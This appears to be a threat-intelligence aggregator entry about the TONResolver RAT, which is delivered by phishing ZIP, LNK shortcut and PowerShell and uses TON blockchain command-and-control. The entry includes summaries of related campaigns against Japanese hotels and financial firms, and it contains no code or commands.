TONResolver RAT delivered via ZIP, LNK, and PowerShell
Malware Activity
Summary
Hide ▲
Show ▼
The TONResolver malware implant was delivered through a ZIP/LNK/PowerShell chain that can establish a remote access trojan foothold and enable command execution. The payload is tracked as TrojanSpy.JS.TONRESOLVER.A and is designed for follow-on compromise rather than simple nuisance behavior. It also uses the TON blockchain to make command-and-control switching harder to detect and block. The delivery and obfuscation layers raise the cost of inspection, containment, and takedown.
Related Happenings
Booking.com partner accommodation phishing campaign targeting Japan
Campaign
H score32
First: 30.06.2026 13:30
Last: 30.06.2026 13:30
Sources 1
How related:
Cyber threat actors are targeting employees of Booking.com partner accommodations in Japan, using phishing emails that impersonate guest complaints and review requests to trick hotel staff into executing malicious files.
About this happening:
A **phishing campaign** is targeting **Booking.com partner accommodations in Japan** with guest-complaint and review-request lures that deliver **malicious files** for **TONResolv...
Booking.com partner accommodation phishing campaign targeting Japan
CampaignHow related: Cyber threat actors are targeting employees of Booking.com partner accommodations in Japan, using phishing emails that impersonate guest complaints and review requests to trick hotel staff into executing malicious files.
About this happening: A **phishing campaign** is targeting **Booking.com partner accommodations in Japan** with guest-complaint and review-request lures that deliver **malicious files** for **TONResolv...
TonRAT Node.js implant with TON blockchain C2
Malware Activity
H score24
First: 26.06.2026 12:27
Last: 26.06.2026 12:27
Sources 1
About this happening:
**TonRAT** is using a **Node.js implant** to hide command-and-control lookups behind the **TON blockchain API**, increasing the chance that blocking and detection will fail. The a...
TonRAT Node.js implant with TON blockchain C2
Malware ActivityAbout this happening: **TonRAT** is using a **Node.js implant** to hide command-and-control lookups behind the **TON blockchain API**, increasing the chance that blocking and detection will fail. The a...
OXLOADER loader stages CastleStealer via UAC prompting and DLL side-loading
Malware Activity
H score20
First: 22.06.2026 16:20
Last: 22.06.2026 16:20
Sources 1
About this happening:
The **OXLOADER** malware activity now shows a **loader** delivering **CastleStealer** through **PowerShell**, **UAC** prompting, and **DLL side-loading**, giving the stealer a ste...
OXLOADER loader stages CastleStealer via UAC prompting and DLL side-loading
Malware ActivityAbout this happening: The **OXLOADER** malware activity now shows a **loader** delivering **CastleStealer** through **PowerShell**, **UAC** prompting, and **DLL side-loading**, giving the stealer a ste...
RemotePE memory-only RAT activity by Lazarus Group targeting financial and cryptocurrency organizations
Malware Activity
H score28
First: 25.05.2026 12:32
Last: 25.05.2026 12:32
Sources 1
About this happening:
The **RemotePE** malware has been tied to **Lazarus Group** activity against **financial and cryptocurrency organizations**, raising the risk of stealthy long-term access and late...
RemotePE memory-only RAT activity by Lazarus Group targeting financial and cryptocurrency organizations
Malware ActivityAbout this happening: The **RemotePE** malware has been tied to **Lazarus Group** activity against **financial and cryptocurrency organizations**, raising the risk of stealthy long-term access and late...
OAuth-phished ZIP/LNK/PowerShell malware delivery chain
Malware Activity
H score19
First: 03.03.2026 11:20
Last: 03.03.2026 11:20
Sources 1
About this happening:
**ZIP-delivered malware** now uses a **PowerShell** and **DLL side-loading** chain to infect Windows devices and reach an external **C2 server**, increasing the risk of follow-on...
OAuth-phished ZIP/LNK/PowerShell malware delivery chain
Malware ActivityAbout this happening: **ZIP-delivered malware** now uses a **PowerShell** and **DLL side-loading** chain to infect Windows devices and reach an external **C2 server**, increasing the risk of follow-on...
Timeline
-
30.06.2026 13:30 2 articles · 3h ago
TONResolver RAT delivered via ZIP, LNK, and PowerShell
Initial DisclosureA **phishing-delivered ZIP file** contained a disguised **LNK** shortcut that launched **TrojanSpy.JS.TONRESOLVER.A** through a **PowerShell** script. That first stage established the malware's initial foothold and set up persistent access for later commands.
Show sources
- Hackers Leverage Blockchain to Hit Japan's Hotels Through Booking.com Phishing — www.infosecurity-magazine.com — 30.06.2026 13:30
- Hackers Leverage Blockchain to Hit Japan's Hotels Through Booking.com Phishing — www.infosecurity-magazine.com — 30.06.2026 13:30